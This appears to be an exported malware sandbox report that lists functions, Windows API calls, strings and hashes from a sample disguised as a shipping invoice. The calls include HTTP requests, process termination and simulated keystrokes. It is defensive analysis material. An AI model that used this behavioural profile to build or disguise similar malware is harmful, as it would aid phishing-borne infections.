Opcode ID: 382b209a2cba78ddf8e41334d2b6ba1cf6c3b081d995b84236608703fe32d354
Instruction ID: f6a348beda4ffe143d5e590981e048a75270d40ba3837d0816f26ad695a91573
Opcode Fuzzy Hash: 382b209a2cba78ddf8e41334d2b6ba1cf6c3b081d995b84236608703fe32d354
Instruction Fuzzy Hash: 57318271640204BFDB119F64DC98BAE7BA9EB51356F104037FA01D6250E7789D818FAE

Function 00432C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00432C94

Part of subcall function 004329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000), ref: 004329DE
Part of subcall function 004329C8: GetLastError.KERNEL32(00000000,?,0043D7D1,00000000,00000000,00000000,00000000,?,0043D7F8,00000000,00000007,00000000,?,0043DBF5,00000000,00000000), ref: 004329F0

_free.LIBCMT ref: 00432CA0
_free.LIBCMT ref: 00432CAB
_free.LIBCMT ref: 00432CB6
_free.LIBCMT ref: 00432CC1
_free.LIBCMT ref: 00432CCC
_free.LIBCMT ref: 00432CD7
_free.LIBCMT ref: 00432CE2
_free.LIBCMT ref: 00432CED
_free.LIBCMT ref: 00432CFB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction ID: 3051c53e0822a8872d8489ac48bb26e9ebb0418146d7d3ac8d6911c10ac1cf4c
Opcode Fuzzy Hash: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
Instruction Fuzzy Hash: F9112BB6200018BFCB02EF55EA42DDD3BA5FF09344F4050AAFA485F232D675EE509B94

Function 00401410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401459
OleUninitialize.OLE32(?,00000000), ref: 004014F8
UnregisterHotKey.USER32(?), ref: 004016DD
DestroyWindow.USER32(?), ref: 004424B9
FreeLibrary.KERNEL32(?), ref: 0044251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0044254B

Strings

close all, xrefs: 00401454

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3d1dd693a3a782e6c4e9f1bbd6ef2690dc1141c438bd47c980261ecb8bbc567e
Instruction ID: 1b622f8cca6128ea30bf35ea39827fa5fc47dd8eb3ad01c4cafdaef943526809
Opcode Fuzzy Hash: 3d1dd693a3a782e6c4e9f1bbd6ef2690dc1141c438bd47c980261ecb8bbc567e
Instruction Fuzzy Hash: 48D19D317012129FDB19EF15C995A29F7A0BF05304F5441AFE84A7B3A2DB38AD12CF59

Function 00405BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00405C7A

Part of subcall function 00405D0A: GetClientRect.USER32(?,?), ref: 00405D30
Part of subcall function 00405D0A: GetWindowRect.USER32(?,?), ref: 00405D71
Part of subcall function 00405D0A: ScreenToClient.USER32(?,?), ref: 00405D99

GetDC.USER32 ref: 004446F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00444708
SelectObject.GDI32(00000000,00000000), ref: 00444716
SelectObject.GDI32(00000000,00000000), ref: 0044472B
ReleaseDC.USER32(?,00000000), ref: 00444733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004447C4

Strings

U, xrefs: 00444693

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: fc88bf487012d287045aa7dbc4333abd7d516997430eb8e6c17b957814580e93
Instruction ID: 18c0316b4590178f6e3925bbe4dbfa53a0d9920bccc32b03521c8a94a4d491fc
Opcode Fuzzy Hash: fc88bf487012d287045aa7dbc4333abd7d516997430eb8e6c17b957814580e93
Instruction Fuzzy Hash: 8171E030400205DFEF218F64C984ABB7BB1FF86324F14427BED556A2A6C7389842DF69

Function 0047359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004735E4

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

LoadStringW.USER32(004D2390,?,00000FFF,?), ref: 0047360A

Strings

Line %d (File "%s"):, xrefs: 0047366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00473724
"%s" (%d) : ==> %s:, xrefs: 00473742
^ ERROR, xrefs: 004736C9
Error: , xrefs: 004736EF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: eb896b8e2b1799887fce0511e1a89e17cc79fd2e457b7826d85e33af4f969589
Instruction ID: 1ab214c128badca45ff07410e642431328e0b3a6551c87b6a7327aa8e2f1ad17
Opcode Fuzzy Hash: eb896b8e2b1799887fce0511e1a89e17cc79fd2e457b7826d85e33af4f969589
Instruction Fuzzy Hash: 67517371800209BADF14EFA1CC42EEEBB79AF04745F14813BF505721A2EB391A99DF59

Function 0047C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0047C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0047C2CA
GetLastError.KERNEL32 ref: 0047C322
SetEvent.KERNEL32(?), ref: 0047C336
InternetCloseHandle.WININET(00000000), ref: 0047C341

Strings

, xrefs: 0047C2BB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 2ae87fead1b28522ffa763f2cfc4779ca44399286855b199adfd1e371db4c569
Instruction ID: 7f47d04d608913b586c8f08289edd0458440cd40b92be60ebc4de0d4a00b3483
Opcode Fuzzy Hash: 2ae87fead1b28522ffa763f2cfc4779ca44399286855b199adfd1e371db4c569
Instruction Fuzzy Hash: 14317171500604AFD7219FA58CC4AAB7BFCEB59744B10C52FF84A92201DB38DD059BA9

Function 0046989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00443AAF,?,?,Bad directive syntax error,0049CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004698BC
LoadStringW.USER32(00000000,?,00443AAF,?), ref: 004698C3

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00469987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 004698F1
Line %d (File "%s"):, xrefs: 0046992D
Error: , xrefs: 00469955
., xrefs: 0046996D
Line %d:, xrefs: 00469912

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 35c814936f1dd32bc15b5df856404db4fb2140b47f2021faa70e6393b4990be8
Instruction ID: 551ec2a85a5fe91f92dce7e2b3b89b7bc3e306fd30fdb11d4db69dc2ba035c50
Opcode Fuzzy Hash: 35c814936f1dd32bc15b5df856404db4fb2140b47f2021faa70e6393b4990be8
Instruction Fuzzy Hash: 2321913181021AABCF15AF90CC46FEE7739BF14705F04446FF915710A2EB79AA28DB19

Function 0046209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004620AB
GetClassNameW.USER32(00000000,?,00000100), ref: 004620C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0046214D

Strings

SHELLDLL_DefView, xrefs: 004620CC
details, xrefs: 004620FB
smallicons, xrefs: 00462115
list, xrefs: 0046212F
largeicons, xrefs: 004620E1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 8c65e68c5093e92e7d410f0c47d842fd6cd50d60c2769177c48d3f94328cf3cb
Instruction ID: 92216a087c2b3a214069876dba0e85c20e3b9e2fc58689a3b3ad7a817c6cf774
Opcode Fuzzy Hash: 8c65e68c5093e92e7d410f0c47d842fd6cd50d60c2769177c48d3f94328cf3cb
Instruction Fuzzy Hash: 3D11E77A788B17B9F6016621AC06EEB779CDB16324B20002BFB04A51D1FEAD7C42551E

Function 0043CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0043CEB7
_free.LIBCMT ref: 0043CF22
_free.LIBCMT ref: 0043CF48
_free.LIBCMT ref: 0043CF71
_free.LIBCMT ref: 0043CFA9
_free.LIBCMT ref: 0043CFDA
_free.LIBCMT ref: 0043D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0043D09C
_free.LIBCMT ref: 0043D0B5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 755353a0899066e8f4f07fb7a531df8e2d90b31389a803dea094346c2faad477
Instruction ID: 05b1af434bcca4c45db1c3e2a8b3b367b08b06696651023259944f127f524509
Opcode Fuzzy Hash: 755353a0899066e8f4f07fb7a531df8e2d90b31389a803dea094346c2faad477
Instruction Fuzzy Hash: 9C6136B1A04310AFDB25AFB5A881B6A7BA5EF0D318F14516FF900A7381D63A9901C79C

Function 004950D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00495186
ShowWindow.USER32(?,00000000), ref: 004951C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 004951CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 004951D1

Part of subcall function 00496FBA: DeleteObject.GDI32(00000000), ref: 00496FE6

GetWindowLongW.USER32(?,000000F0), ref: 0049520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0049521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0049524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00495287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00495296

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 63f8fce6ee56eb2916ba1f5880f577bd9ce9be7d31bf0783226abd7592391d9a
Instruction ID: 2f6ec6b9a940971946aba6a87621bbb08546372b017322c8b31ba23090961908
Opcode Fuzzy Hash: 63f8fce6ee56eb2916ba1f5880f577bd9ce9be7d31bf0783226abd7592391d9a
Instruction Fuzzy Hash: F3519F30A40A08BEEF229F65CC46BD93F65AB05325F344077FA25962E0C379A981DF49

Function 00418B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00456890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004568A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004568B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004568D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004568F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00418874,00000000,00000000,00000000,000000FF,00000000), ref: 00456901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0045691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00418874,00000000,00000000,00000000,000000FF,00000000), ref: 0045692D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: d63c51336c4034a1745d8c490dd669fa66d818d99361f70e4bdf35798142b978
Instruction ID: 5ced514379628bb0f67f0973741f5ab2a5dfa9bdd961912c2b7f256765f21f3b
Opcode Fuzzy Hash: d63c51336c4034a1745d8c490dd669fa66d818d99361f70e4bdf35798142b978
Instruction Fuzzy Hash: 60518CB0600209EFDB20DF25CC91BAA7BB5FF54350F10452EF906972A0DB78E991DB58

Function 0047C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0047C182
GetLastError.KERNEL32 ref: 0047C195
SetEvent.KERNEL32(?), ref: 0047C1A9

Part of subcall function 0047C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047C272
Part of subcall function 0047C253: GetLastError.KERNEL32 ref: 0047C322
Part of subcall function 0047C253: SetEvent.KERNEL32(?), ref: 0047C336
Part of subcall function 0047C253: InternetCloseHandle.WININET(00000000), ref: 0047C341

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 05408d45139247b7bcb9b0ab34475d6da33b465ea748379226b62031ee06977d
Instruction ID: ad223e64a256ba6d622a408250f1e533b8ca103c90cb607afc9d9c604c5bfcdd
Opcode Fuzzy Hash: 05408d45139247b7bcb9b0ab34475d6da33b465ea748379226b62031ee06977d
Instruction Fuzzy Hash: 3931A171900601AFDB219FA5DD84AA7BBF9FF28300B00847FF95A82611C734E8109FA8

Function 004625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00463A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00463A57
Part of subcall function 00463A3D: GetCurrentThreadId.KERNEL32 ref: 00463A5E
Part of subcall function 00463A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004625B3), ref: 00463A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 004625BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004625DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004625DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 004625E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00462601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00462605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0046260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00462623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00462627

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 2f4d1fdb8c17c331799828f8887b12a5bf7f082a9617624e6a7c48990999124f
Instruction ID: 659e0465d2e936b2535ace8495fd7f55644899dc4765ae7d9b52ae139348cc60
Opcode Fuzzy Hash: 2f4d1fdb8c17c331799828f8887b12a5bf7f082a9617624e6a7c48990999124f
Instruction Fuzzy Hash: 5E01B530290610BBFB1067699CCAF593E59DF9AB52F100026F314AE0D1C9E11444DA6E

Function 00461803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00461449,?,?,00000000), ref: 0046180C
HeapAlloc.KERNEL32(00000000,?,00461449,?,?,00000000), ref: 00461813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00461449,?,?,00000000), ref: 00461828
GetCurrentProcess.KERNEL32(?,00000000,?,00461449,?,?,00000000), ref: 00461830
DuplicateHandle.KERNEL32(00000000,?,00461449,?,?,00000000), ref: 00461833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00461449,?,?,00000000), ref: 00461843
GetCurrentProcess.KERNEL32(00461449,00000000,?,00461449,?,?,00000000), ref: 0046184B
DuplicateHandle.KERNEL32(00000000,?,00461449,?,?,00000000), ref: 0046184E
CreateThread.KERNEL32(00000000,00000000,00461874,00000000,00000000,00000000), ref: 00461868

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3295afeee8cc8c7093bf6fe07bd8220d614ae4baa1aa8168f6bf151d454cb0f3
Instruction ID: b364dd57c3a3bf7db4e02ab8b84294dee306902c98affd7dc5dc9744fb0d4595
Opcode Fuzzy Hash: 3295afeee8cc8c7093bf6fe07bd8220d614ae4baa1aa8168f6bf151d454cb0f3
Instruction Fuzzy Hash: 3101AC75240304BFE610AB65DD8AF5B3B6CEB99B11F404422FA05DB1A1D6749C008F38

Function 0048A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0046D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0046D501
Part of subcall function 0046D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0046D50F
Part of subcall function 0046D4DC: CloseHandle.KERNEL32(00000000), ref: 0046D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0048A16D
GetLastError.KERNEL32 ref: 0048A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0048A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0048A268
GetLastError.KERNEL32(00000000), ref: 0048A273
CloseHandle.KERNEL32(00000000), ref: 0048A2C4

Strings

SeDebugPrivilege, xrefs: 0048A18F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 91a1d346542f3b818cfef32e4957358fa657d51a12c24dba774d987266b5289d
Instruction ID: bbae0825d9504e816833fa2aec840b687267c384c8e474c3100c895eea3b3aa3
Opcode Fuzzy Hash: 91a1d346542f3b818cfef32e4957358fa657d51a12c24dba774d987266b5289d
Instruction Fuzzy Hash: C96180702042429FE720EF15C4D4F1ABBE1AF54318F18849EE4564B7A3C7BAEC55CB9A

Function 00493886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00493925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0049393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00493954
_wcslen.LIBCMT ref: 00493999
SendMessageW.USER32(?,00001057,00000000,?), ref: 004939C6
